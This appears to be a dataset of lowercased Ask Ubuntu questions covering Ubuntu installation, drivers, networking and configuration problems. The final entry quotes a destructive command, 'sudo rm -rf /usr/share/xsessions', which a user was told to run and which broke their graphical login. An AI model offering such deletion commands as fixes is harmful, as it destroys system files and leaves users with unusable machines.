258394	error installing php 5.3.21 on ubuntu 12.04	i 'm trying to install php 5.3.21 on a rackspace cloud server running ubuntu 12.04 but i keep running into errors during configure . it keeps giving me the following error : configure : error : can not find imap library ( libc-client.a ) . please check your c-client installation . here is my php configuration script : ./configure -- enable-fpm -- enable-cli -- with-fpm-user=phpfpm -- with-fpm-group=phpfpm -- prefix=/usr/local/php -- exec-prefix=/usr/local/php -- with-config-file-path=/usr/local/php/etc -- with-config-file-scan-dir=/usr/local/php/etc/conf.d -- with-libdir=/lib/x86_64-linux-gnu -- enable-bcmath -- enable-ctype -- with-curl -- with-curlwrappers -- with-pear -- enable-dba -- with-cdb -- enable-exif -- enable-ftp -- disable-fileinfo -- with-gd -- with-jpeg-dir -- with-png-dir -- with-zlib-dir -- with-xpm-dir -- with-freetype-dir -- with-t1lib -- enable-gd-native-ttf -- with-gettext -- with-gmp -- with-imap=/usr/local/c-client-2007f -- with-imap-ssl -- with-ldap -- with-ldap-sasl -- enable-mbstring=all -- with-mcrypt -- with-mhash -- with-mysql -- with-mysqli -- with-pdo-mysql -- enable-sqlite-utf8 -- with-openssl -- with-kerberos -- with-pspell -- enable-shmop -- enable-simplexml -- with-snmp -- enable-soap -- enable-sockets -- with-tidy -- enable-wddx -- enable-xmlreader -- with-xmlrpc -- with-xsl -- enable-zip -- with-zlib -- enable-sysvsem -- enable-sysvshm and here are the packages i installed prior : apt-get -y install php5-dev php-pear php5-imap apt-get -y install libxml2-dev libevent-dev zlib1g-dev libbz2-dev libgmp3-dev libssl-dev libcurl4-openssl-dev libjpeg-dev libpng-dev libxpm-dev libgd2-xpm-dev libmcrypt-dev memcached libmemcached-dev libpcre3-dev libc-client-dev libkrb5-dev libsasl2-dev libmysqlclient-dev libpspell-dev libsnmp-dev libtidy-dev libxslt-dev libtool libc-client2007e libc-client2007e-dev apt-get -y build-dep t1lib printf `` \n '' | apt-get -y install t1lib-bin libt1-dev i have also tried installing the c-client imap from source using the following : wget ftp : //ftp.cac.washington.edu/imap/c-client.tar.z tar -xvf c-client.tar.z cd imap-2007f make clean make ldb extraauthenticators=gss passwdtype=gss ip6=4 cp c-client/c-client.a c-client/libc-client.a mkdir -p /usr/local/c-client-2007f/lib mkdir -p /usr/local/c-client-2007f/include cp c-client/*.h /usr/local/c-client-2007f/include cp c-client/*.a /usr/local/c-client-2007f/lib cd .. but i still get the error . i 'd appreciate any assistance to enable me resolve this . thanks .
258395	12.10 desktop install stuck on checksum function	installing 12.10 desktop i386 via usb and not winning so far . following http : //www.ubuntu.com/download/help/install-desktop-latest and it gets to step 9 displaying the screen `` learn more about ubuntu while the system install ... '' and then it changes to a black screen with a small spinning wheel and the following text on top : [ 7.232452 ] xor : automatically using best checksumming function : [ 7.272005 ] piii_see : 1856.000 mb-sec and then it just stays there . its installing on a brand new 500gb hdd as the only system . i tried windows xp before but it failed as it seemed like my xp cd was damaged . so i 'm trying ubuntu as advised by many but so far not getting anywhere . any help would be greatly appreciated . this is my first attempt at ubuntu or any linux based os . thanks neville
258406	allow webrick server to be accessed over wifi	i am trying to access a rails server running at 0.0.0.0:3000 on my computer from a tablet on the same wifi . i can connect to regular webserver :80 , but somehow ca n't get to the :3000 . i tried : sudo ufw enable 3000 but that did n't help .
258407	all of my ubuntu apps dont work ?	all of my ubuntu app have n't been working like the things that came with ubuntu and the things i have downloaded from the ubuntu software center . i cant even open things like update manager or the ubuntu software center and all the things i need to use that i have downloaded do n't work either . all it does is open up a window then closes itself imediatedly and then the `` system program problem detected do you want to report the problem now ? '' thing come up and i 've reported it many time but nothing happens still . also a few seconds later the `` the application ( name of application ) has closed unsuspectedly '' and again i 've send many error reports and if i try to reopen it , the same thing happens . please help i need the applications alot ! ! ! !
258408	why does n't picture viewer open any images ?	picture viewer does not seem to open any images . the program starts up , but the screen is blank . i am trying this in a triple monitor set-up in a hungarian language version of ubuntu 12.04.2 . i have a video that shows what the problem is on youtube how do i get picture viewer working again ?
258411	gparted found problems when `` checking '' both primary partitions . how to fix ?	i am using gparted ( from ubuntu live cd ) to enlarge my win vista and shrink my ubuntu 9.04 partitions . reports of `` check '' process on each partition are here : vista partition : ubuntu partition : previous to these 2 steps i had made some other partition changes , so probably screwed something up . i have cds ( and backup personal files ) to reinstall the win vista , and will use the ubuntu live cd to install a new ubuntu 12.10 . what is the easiest way for me to fix this so i can complete my final 2 steps : move and shrink the ubuntu partition grow the vista partition
258415	my hard disk converted from ntfs tp raw . can it be recovered in ubuntu ?	in my internal hard disk suddenly this message appeared at boot ( a disk read error occurred press ctrl + alt + del to restart ) in windows 7 i have connected it as external hd to another laptop . i can see the partitions but it asks me to format it and when i want to make chkdsk it says not supported for raw . is there any way to recover it in ubuntu ?
258416	how to add bookmark to nautilus 3.6 ?	i updated the nautilus to 3.6 in ubuntu 12.10 , but i did n't find the how to add my folder to `` bookmark '' section . if i press `` ctrl+b '' , it show the list of bookmarks , but i ca n't add any . i ca n't drag & drop just like in other versions . does anyone know how to do this properly ?
258421	dkms install stalling	i had a crash , something i did i 'm sure , and installed ubuntu 11.10 from a thumb drive . i then upgraded to 12.04 basically immediately . from there i found my wireless not working . so following some instructions in ask ubuntu i tried to get it working . currently it said i needed to do a sudo dpkg command , i did , and now it is stalled at dkms : install completed . dkms : uninstall completed . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 6.20.155.1+bdcom completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . loading new bcmwl-6.20.155.1+bdcom dkms files ... building only for 3.2.0-38-generic building for architecture i686 building initial module for 3.2.0-38-generic done . wl : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-38-generic/updates/dkms/ depmod ... . dkms : install completed . i hit ctrl + c and this came up : setting up build-essential ( 11.5ubuntu2.1 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-38-generic errors were encountered while processing : bcmwl-kernel-source so now what ? i apparently need to rebuild the kernel ? and wireless is still not available until i do .
258422	netcut needed for ubuntu 12.10	hi is there any netcut software for ubuntu ? i really needed since my lan is keep on spoofing by my neighbor .
258428	how do i start emacs ?	i am trying linux again after many years , and i have installed ubuntu 12.10 . i have downloaded the full gnu emacs24 package , but i can not get it to launch a text editor . can someone tell me what i have to do to get it to launch ? i keep getting : emacs ~/test.txt the program 'emacs ' can be found in the following packages : * emacs23 * emacs23-nox * emacs24 * emacs24-nox * e3 * emacs23-lucid * emacs24-lucid * jove try : sudo apt-get install < selected package > any help is appreciated .
258429	how to enable a disabled wifi	i 've somehow managed to disable my wifi a few days ago . now the laptop does n't seem to be able to relate anything to wlan0 . [ the hardware switch is on , and i do n't have a windows to check if it works there . ] here are outputs of some commands that might help : for ifconfig eth0 link encap : ethernet hwaddr 00:1b:24:80:63:03 inet addr:10.5.52.146 bcast:10.5.52.255 mask:255.255.255.0 inet6 addr : fe80 : :21b:24ff : fe80:6303/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:218095 errors:0 dropped:0 overruns:0 frame:0 tx packets:71280 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:311077218 ( 311.0 mb ) tx bytes:6798891 ( 6.7 mb ) interrupt:45 base address:0x8000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2996 errors:0 dropped:0 overruns:0 frame:0 tx packets:2996 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:244647 ( 244.6 kb ) tx bytes:244647 ( 244.6 kb ) and for sudo ifconfig wlan0 wlan0 : error fetching interface information : device not found also for sudo ifup wlan0 ignoring unknown interface wlan0=wlan0 . and finally , sudo lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 01 serial : 00:1b:24:80:63:03 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a ip=10.5.52.146 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:45 ioport:2000 ( size=256 ) memory : f0200000-f0200fff memory : a0800000- a081ffff *-network unclaimed description : network controller product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:04:00.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f0300000-f0300fff the output of lspci for my network controller is : 04:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) so i tried sudo apt-get install linux-backports-modules-* but it 's still the same !
258435	sudo apt-get install ( google-chrome-stable_current_amd64.deb ) is not working	i was told that sudo apt-get install ( package.deb ) installs the software with all the dependencies too . i am trying install google chrome , but when i do this step , it generates the following error : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package google-chrome-stable_current_amd64.deb e : could n't find any package by regex 'google-chrome-stable_current_amd64.deb' does anyone have a solution to this problem ?
258440	is it possible to use the conditional arguments in a preseed ?	i am trying to create a preseed.cfg that is usable for a cd based installation and a network based installation . i figured the easiest way to do this would be to use a bash conditional `` if '' . as part of preseed/late i have something similar to the following . d-i preseed/late_command string \ if [ -f `` /media/cdrom/pool/extras/info.gz '' ] ; \ then\ echo `` cd install info '' ; \ cp /media/cdrom/pool/extras/info.gz /target/var/www/info.gz ; \ else\ echo `` assuming network install '' ; \ wget http : //192.168.0.1/info.gz ; \ cp ./info.gz /target/var/www/info.gz ; \ fi which fails with an error saying that `` fi is expected '' . i figured this was an issue with the parser so i condensed everything onto one line . if [ -f `` media/cdrom/pool/extras/info.gz '' ] ; cp /media/cdrom/pool/extras/info.gz /target/var/www/info.gz ; fi this command finishes without an error , but the file is not copied . after many attempts using different syntax i began to wonder if this is even possible . so is it possible to use conditionals ( if there are others besides if i should try let me know ) during preseed/late ?
258443	replacing windows 8 with ubuntu 12.10 on an ideapad u510	i have ( very ) recently purchased a new lenovo ideapad u510 with a 24 gb ssd , and was quite disappointed with windows 8 . so i am considering replacing it with ubuntu 12.10 . i have some experience in the past with ubuntu and mint , and it has always been simple to install or make partitions - but i 've been hearing things about the secure boot feature preventing this . at least without taking extra steps . what exactly do i need to do ? i 've also been hearing about samsung laptops being bricked because of installing other oses . is that the case with lenovos too ? i just want to make sure , as i do n't want to risk ruining my laptop 's hardware . thanks .
258448	how can i trigger a mouse click followed by keyboard presses with a short-cut key ?	i would like to find a script or a short program that when a certain key is pressed , i get left-click on mouse , then right arrow , 10 times in 1 second , for the duration the key is pressed .
258452	is there a 64bit version of ubuntu for intel cpus ?	i have a lenovo ideapad y580 that i 'm planning on dual booting with . i want to use ubuntu 13.04 , but on the daily builds download page there is only `` pc ( intel x86 ) desktop image '' listed for intel , and `` 64-bit pc ( amd64 ) desktop image '' listed for amd cpus . is there no 64bit for intel ? should i just use the 32bit ? or should i just download 12.10 instead ?
258453	why is transferring videos to my google nexus 7 so slow ?	i recently installed ubuntu , and the only thing that is n't working is my nexus . i 'm currently using airdroid but it takes so long to transfer videos . can anybody please talk me through how to do this , as i have followed a few guides but i keep getting errors or unusual return messages .
258471	problem installing git kubuntu	i have installed both git and git-core using sudo apt-get install git git-core still when i try to run some git command on terminal , i get the following error message : the program 'git ' is currently not installed . you can install it by typing : sudo apt-get install git i retried and retried over , i get the same error , also i tried removing and reinstalling git . how do i get git to work ?
258473	why ubuntu 12.10 displays launcher icons in different size , but 12.04 displays them in the same size ?	on ubuntu 12.10 , the launcher icons are displayed in different size in unity : but on ubuntu 12.04 , they are all rendered nicely to the same size : is it a bug in ubuntu 12.10 ? how can i change the settings to make ubuntu 12.10 to render the launcher icons to the same size ? thanks .
258477	long time to boot in ubuntu	it takes almost 6 minutes to boot into ubuntu 12.04 . my laptop is lenovo y550p . i edited the grub menu while booting and tried acpi=off . it still takes the same time . the link shows my dmesg output : http : //pastebin.com/pqv06rw4 kindly help me with this .
258479	how can i edit the contextual ( right-click ) menu in nautilus and unity ?	how can i edit the contextual menu in ubuntu ? how can i add/remove items ? will the method for ubuntu also work for variants such as kubuntu/xubuntu/lubuntu ? is there a configuration file that i can edit , or do i have to use a program/utility instead ? edit : someone pointed out that every program handles its own contextual menu . in particular , i would like to be able to edit the contextual menus for nautilus and the unity desktop interface .
258480	resizing wubi installation	i 've recently installed ubuntu using wubi on my windows 7 computer . my goal is to instal team fortress 2 onto the ubuntu part so i can play tf2 in linux . so far everything has gone well from installing steam to transfering the tf2 backup over so i would not have to redownload the 12gb . however , this is where the trouble arises . i can not remember the specific amount of space that i allowed ubuntu when i installed it , but it is not enough . how can i increase the space that ubuntu can use so that i can instal team fortress 2 ?
258484	dual monitor resolution problem	whenever i plug in my second monitor , which is my tv that i plug in using hdmi , the screen zooms in really far , and i can only access about half of the desktop . i have windows on my other hard drive on the computer , and the dual monitors runs fine with it , but ubuntu screws it up . i had to unplug the drive that had ubuntu on it , because it even caused my bios to be zoomed in really far , and therefore useless . does anyone know a way i could fix this ?
258486	will a live usb with persistence store files automatically ?	i 'm not even sure if i worded my question right but , i 'm familiarizing myself with ubuntu and want to install it on a new desktop i just finished putting together so i 'm trying it on my laptop via live usb first . i had trouble mounting my ntfs windows partitioned disks , solved that problem but i also see a disk that has the exact amount of memory i alloted for persistence . i try to access it but it shows the same acl error i got when my ntfs disks were n't mounting . i 've already downloaded some stuff and made some things with libreoffice and want to know if those things have been save automatically or if i have to mount the usb disk for it to be persistent .
258489	how do i create a partion to install windows ?	i 'm using ubuntu 12.04 and i want to create a partition to install windows 7 onto it . how can i do this ?
258490	how to set two finger scrolling and keep side scrolling as well ( touchpad )	gnome settings contains an option for enabling two-finger scrolling . this is a nice feature but i require side scrolling as well . ideally , i would like to have enabled both options . is that possible ? thank you very much .
258491	vsftpd chroot opps on ubuntu 12.04	i 'm unfamiliar with deb based systems , so my apologies if the solution is simple . i 'm trying to setup vsftpd to jail users to their home directories . i get the 500 oops : vsftpd : refusing to run with writable root inside chroot ( ) i research this problem , and find the common solution is to use the backport provided by thefrontiergroup like so : sudo add-apt-repository ppa : thefrontiergroup/vsftpd when i do this , i get a python error : you are about to add the following ppa to your system : vsftpd 2.3.5 with the allow_writeable_chroot feature backported from vsftpd 3 . more info : https : //launchpad.net/~thefrontiergroup/+archive/vsftpd press [ enter ] to continue or ctrl-c to cancel adding it exception in thread thread-1 : traceback ( most recent call last ) : file `` /usr/lib/python2.7/threading.py '' , line 551 , in __bootstrap_inner self.run ( ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 99 , in run self.add_ppa_signing_key ( self.ppa_path ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 132 , in add_ppa_signing_key tmp_keyring_dir = tempfile.mkdtemp ( ) file `` /usr/lib/python2.7/tempfile.py '' , line 322 , in mkdtemp name = names.next ( ) file `` /usr/lib/python2.7/tempfile.py '' , line 141 , in next letters = [ choose ( c ) for dummy in `` 123456 '' ] file `` /usr/lib/python2.7/random.py '' , line 274 , in choice return seq [ int ( self.random ( ) * len ( seq ) ) ] # raises indexerror if seq is empty valueerror : can not convert float nan to integer attempting to find another solution , i find a recommendation to change the permissions of the home directories as in this article vsftpd - restrict users to home directory however , following this would lead to a lot of manual permission resetting , because i want a subdirectory of each user to be accessible via apache like is described in the userdir apache config http : //httpd.apache.org/docs/2.2/howto/public_html.html in the end , i want to be able to adduser foo and magically end up with the ability for foo to have full r/w privelages in /home/foo without being able to see any other part of the filesystem , to have http : //x.x.x.x/~foo/ accessible for anybody , and shell access if i change their shell from nologin to bash . ubuntu 12.04 lts , vsftpd 2.3.5 please offer any advice ... i 'm stuck scratching my head !
258492	wifi adapter driver problem	i just installed my first ubuntu desktop as a dual boot with windows 7 . i had to install without internet access because my wireless would n't connect , it 's not possible to use a wired connection . my usb wifi adapter was bought off ebay recently and says compatible with linux . for it to work with win 7 , i had to install the driver provided in the ebay listing , it 's a link to download a zip file . i tried downloading the zip and copying it to ubuntu but when i try to run setup.exe i keep getting `` an error occurred while loading the archive . meanwhile i keep getting asked for my wireless password ( which is n't working ) . the ebay listing with the driver is item number 261161990604 . can anyone help get me online ? thanks a lot ! using ubuntu 12.10 lshw -c network shows : warning : you should run this program as super-user . *-network description : wireless interface physical id : 2 bus info : usb @ 1:5 logical name : wlan0 serial : 00:0f:13:05:1c:1d capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8192cu driverversion=3.5.0-17-generic firmware=n/a multicast=yes wireless=ieee 802.11bgn warning : output may be incomplete or inaccurate , you should run this program as super-user . lsusb shows : bus 001 device 005 : id 0bda:8176 realtek semiconductor corp. rtl8188cus 802.11n wlan adapter
258498	juju bootstrap node roles and responsibilities	what is the role of the juju bootstrap node beside connecting to the deployment cloud ? ( the one we call juju bootstrap on ) is this the node with the zookeeper ? is zookeeper running as daemon or just runs with juju call ? what happens if i lose my bootstrap node ? can i have multiple bootstrap nodes for one environment in the cloud ?
258501	ubuntu 12.04.1 and windows 7 on same pc	have ubuntu installed on a 1tb sata 3 hard drive . also have windows 7 installed on a separate 1tb sata 3 hard drive . unplugged windows hard drive before installing ubuntu as previous versions of linux always destroyed my windows installation . what will happen when i plug in the hard drive with windows 7 ? will i get a boot loader that will allow me to choose either os or will 1 or both os 's get wiped ? the computer has uefi support and uses the asus m5a-99x evo motherboard .
258504	nvidia gt 640 issues	i 've recently installed ubuntu , and my mouse is extremely laggy . i have attempted using multiple mice , some wired , others wireless , but to no avail . turning off 3d ubuntu on the log on screen does n't help at all . a few weeks later i installed tf2 to see if it would run well in ubuntu . unfortunately the game lags on the menu , and the graphics were automatically set to low ( very rough , pixel-y edges ) . i 've currently got the beta driver 3.10 ( i 'm pretty sure its the one steam insists i install over the others ) on my nvidia gt 640 . my specs are : intel i5 2320 @ 3.00ghz gigabyte 2gb ddr3 gt 640 dz77bh-55k intel motherboard i 'm currently running ubuntu 12.04 lts ( 64-bit ) dual-booted alongside windows 8 ( 64-bit ) . the uefi is disabled and the motherboard uses bios instead ( the people who built this computer knew what they were doing ! ) . am i using the open source or official drivers ? how can i fix this ? is ubuntu using the integrated graphics on the processor instead of the graphics card ?
258508	how do i configure cups and change samba setting for no printers ?	a couple of time an hour , these lines show up in syslog feb 19 09:20:11 kise-055 smbd [ 5685 ] : [ 2013/02/19 09:20:11.609603 , 0 ] printing/print_cups.c:110 ( cups_connect ) feb 19 09:20:11 kise-055 smbd [ 5685 ] : unable to connect to cups server localhost:631 - connection refused feb 19 09:20:11 kise-055 smbd [ 1081 ] : [ 2013/02/19 09:20:11.610113 , 0 ] printing/print_cups.c:487 ( cups_async_callback ) feb 19 09:20:11 kise-055 smbd [ 1081 ] : failed to retrieve printer list : nt_status_unsuccessful now this computer is the client and server for mythtv ( mythbuntu ) , there are no printers attached , nor does any use of the htpc require a printer . i do use occasionally print to pdf . what do i need to do to stop samba from performing this query and producing these messages in syslog ?
258511	linksys wireless model wpc 300n v1 network adapter	i plan to install ubuntu on an old dell latitude c640 ( mfr . 2003 ) and will increase ram to 1gb . it has a linksys wireless n network adapter ( model wpc300n v1 ) . two questions , what version of ubuntu should i download/install and will the linksys wireless adapter work ?
258517	can mal/javajar-b infect an ubuntu/linux os ?	i 've just read about the mal/javajar-b malware that is apparently capable of attacking os x computers via a security hole in java . i 've also heard a few people mention that it can also affect linux computers , but only from perfunctory sources ( the comments in the article , and a few passing references from googling ) . is such malware a concern for linux users , and should we be running anti-virus software ? ( i know the second question has been addressed here before , but it seems to me that the route of infection of mal/javajar-b is possible even for the paranoid user . if i understand correctly , a popular website was compromised , and anyone that merely visited this website was infected . imagine if askubuntu.com was compromised ! )
258519	installed 12.04 from cd - wo n't boot	i installed ubuntu 12.04 from a cd on a toshiba portege laptop . the installation process seemed to go normally , but now when i try to boot it , it hangs at the `` toshiba leading innovation '' screen . booting from the cd does work ( which is what i 'm doing now ) . the installation wizard says that there is a 12.04 partition on /dev/sda2 . i checked that the bios 's boot order is hdd first . with the installation cd in the drive , i can get to a grub menu by pressing esc , but i do n't know what to do with it . i tried installing boot-repair using the instructions here ( https : //help.ubuntu.com/community/boot-repair ) , but am getting the following error : the following new packages will be installed : boot-repair boot-sav boot-sav-extra gawk glade2script 0 upgraded , 5 newly installed , 0 to remove and 44 not upgraded . 1 not fully installed or removed . e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/cache/apt/archives/ any ideas ? thanks in advance ! edit : i did remove the installation cd when prompted to reboot . edit edit : i ran boot-repair from an ubuntu-secure-remix live usb , and got the following result : http : //paste.ubuntu.com/1691369/ the boot-repair process seemed to go normally , but the computer still does n't boot . solution : for future reference , the problem turned out to be that the bios was in uefi mode . i switched it to csm mode and reinstalled , and that fixed the problem .
258521	unable to install virtualbox on ubuntu 12.10 : kernel headers can not be found	i 'm trying to install virtualbox on ubuntu 12.10 64bit , ( kernel 3.5.0-23 ) . i 've already installed dkms , build-essential , linux-source , linux-kernel-headers , ... . i still get this error : error ! your kernel headers for kernel 3.5.0-23-generic can not be found . please install the linux-headers-3.5.0-23-generic package , or use the -- kernelsourcedir option to tell dkms where it 's located the kernel headers and source are in their appropriate place : ls /usr/src linux-headers-3.5.0-23 linux-source-3.5.0 linux-headers-3.5.0-24 linux-source-3.5.0.tar.bz2 linux-headers-3.5.0-24-generic i know there are tons of similar questions on different forums , i 've tried all of them . none of them works . can anyone help me please ?
258526	ubuntu one / android - how to sync a file daily ?	is there a way to have ubuntu one for android auto sync a text file i leave on my phone ? in /media/u1/ubuntu one/ on my phone , i have a text file with notes i study . i update it everyday . how do i make the ubuntu one android client auto upload this to my online folder ? is there a good ubuntu one for android tutorial i can use for this ? answer resolved : ok i searched askubuntu and found this : manually upload files from android basically , the app doesnt have a upload button , but requires uploading via a another app ( like foldersync for andoid ) . to upload : click + button in android ubuntu one click foldersync select file your phone will upload the file . to download : open ubuntu adnroid one touch the file it will get downloaded to /media/u1/ubuntu one/ ... hope this helps anyone .
258527	why do my speakers randomly shut off but my headphones work ?	whenever im listening to rhythmbox my speakers will shut off after about 45 seconds and wont come back on until i restart my computer . but my headphones work whenever they shut off . does anyone know whats going on ? i am on a toshiba satellite l755-s5248 . here is a screenshot of alsamixer :
258529	backlight flickers after lid close and switch to battery	ubuntu 12.10 32bit with fallback de . i need to set to classic for citrix receiver to work properly . when screens are maximized with unity , the mouse is offset . i can close and re-open the lid if on ac power but on battery , the backlight starts to flash off and on . reconnecting the ac stops the flashing . power options set to do nothing on lid close . seeing the same issue on three different models of hp/compaq laptop ; nc4200 , nc4400 and nc6220 , all running 32 bit . i installed 64 bit on a compaq 6510b with the same fallback and it is fine . it is not out of the norm for my users to close the lid , unplug the ac adapter , and then carry the laptop to another location and open the lid , expecting it to work from the battery . unplugging the ac adapter does nothing so long as the lid does n't get closed .
258530	ca n't install ubuntu 12.10 - nvidia display through hdmi - invalid format ( lg tv )	first , i am new to linux in general so my knowledge is little . i am having a problem installing ubuntu 12.10 on my desktop . i can’t install or run the live cd of ubuntu , on my display it appear invalid format . i will like to know if there is way for installing ubuntu . i read some forums and it appears that the problem is my nvidia video card through the hdmi ( well that’s what i think ) . i have the following hardware specs : motherboard : asus maximus v extreme video card : nvidia gtx680 ram : corsair 32 gb hard drive : 500 gb display : lg tv – through hdmi 1080p ( i don’t have a different type of connector ) attempts : 1.i downloaded the .iso file and burn it on a cd/dvd disk . after that in the menu i tried both options , to install ubuntu and try ubuntu and install . results : by either way i could not install ubuntu . it only shows a black screen with my tv displaying the invalid format message . 2.i downloaded yet again in other pc the .iso file and now installed it on a usb as the guide provided by ubuntu shows . after that in the menu i tried both options , to install ubuntu and try ubuntu and install . results : by either way i could not install ubuntu . it only shows a black screen with my tv displaying the invalid format message . i will appreciate any guidance on this matter . thank you in advance .
258531	can ubuntu be installed using a networked drive ?	my laptop does n't allow booting from usb and the cd drive has gone bad . it has windows xp on it . i want to do away with windows and use ubuntu only .
258532	no more appearance menu	just updated my machine ( it runs ubuntu 12.10 ) , but now it says i run 13.04 ( what ) and i can no longer access the appearance menu in system settings . what 's going on ?
258533	realtek card reader not working	i have an internal card reader in my hp pavilion dv6-6155ca and the card reader is a `` multi-card media reader '' ( i know this means nothing but trying to be though ) and the device is the rts5209 pci express card reader . i am running ubuntu 12.10 . when i insert a sd card nothing happens at all . the card is readable from other devices and i have used at one point in another version of ubuntu . uname -a linux ketterer-ubuntubook 3.5.0-24-generic # 37-ubuntu smp thu feb 7 01:50:30 utc 2013 x86_64 x86_64 x86_64 gnu/linux the output of lspci : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati caicos [ radeon hd 6400m/7400m series ] 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) 0d:00.0 network controller : intel corporation centrino wireless-n 1030 ( rev 34 ) 13:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 ) 19:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) the outout of lspci -vmmnn | grep -a4 -b2 realtek : slot : 13:00.0 class : unassigned class [ ff00 ] vendor : realtek semiconductor co. , ltd. [ 10ec ] device : rts5209 pci express card reader [ 5209 ] svendor : hewlett-packard company [ 103c ] sdevice : device [ 1656 ] rev : 01 output of lsusb : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 138a:0018 validity sensors , inc . bus 001 device 004 : id 5986:02ac acer , inc bus 002 device 004 : id 1058:0748 western digital technologies , inc . bus 002 device 003 : id 8086:0189 intel corp .
258535	how can i use firefox 's built in pdf viewer ?	i downloaded firefox 19 and executed it on my ubuntu 12.04 machine . i went to a website with pdf links , clicked on one of them , hoping to have it shown in the built-in pdf viewer in firefox 19 , but only got the common pop-up menu with the options of viewing it with evince or downloading it to a folder . how can i use firefox 19 built-in pdf viewer ?
258537	is there a way to stop kde 4.10 from suspending at the login screen on laptop close ?	i 'm running a fresh install of kubuntu 12.10 with kde 4.10 installed from the backports ppa . this is my first time using kde , so i 'm still learning where to find everything . i 've got kde 's power management settings set to my liking , so that when i close my laptop lid , the screen turns off but the computer does not go into suspend mode . this works fine when i 'm logged in . however , when i 'm logged out ( i.e. , looking at the lightdm login screen ) , if i close my laptop lid , the computer does go into suspend mode . how can i turn this off , so that the computer does not suspend at the login screen when the lid is closed ? i 've searched on several sites for an answer . however , almost every related question that i found was about turning off suspend when a user is logged in ; this problem is a bit different . i did find stop laptop from suspending when closing lid in lightdm , which does gives a cli answer to this problem . i 'm wondering , though , whether there is a gui setting to toggle this . is this a bug , or is there a setting that i have n't found yet ? i 'll also be happy with answers that better explain what the answer to the linked question is doing . thank you very much !
258540	unity intercepts drag and drop file uploads to webpages	just asking if someone out there has seen the same quirk : if i want to drag a file to a dropzone in a website ( say gmail 's compose interface ) unity brings up the window picker bar ( launcher ) and i ca n't drop the file in the webpage . it 's like nothing happens . i have n't seen if it happens in firefox too , just tried it with chrome .
258541	what does it mean for linux to erase disk space in linux	i am installing linux on virtual box but it says that the computer currently has no detected operating systems . what would you like to do ? 1 ) erase disk and install ubuntu warning : this will delete any files on disk . what should i do ?
258542	removed some directories being root and xubuntu wo n't start	i had some problems before doing this where xfce wo n't start ( applications started , but no borders and could n't type anything on the keyboard ) and someone told me to use this command sudo rm -rf /usr/share/xsessions now not even xorg will start . i can do ctrl alt f1 and use tty-1 and i tried apt-get install -- reinstall xfce4 but the same problem . what do you recommend me to do ?
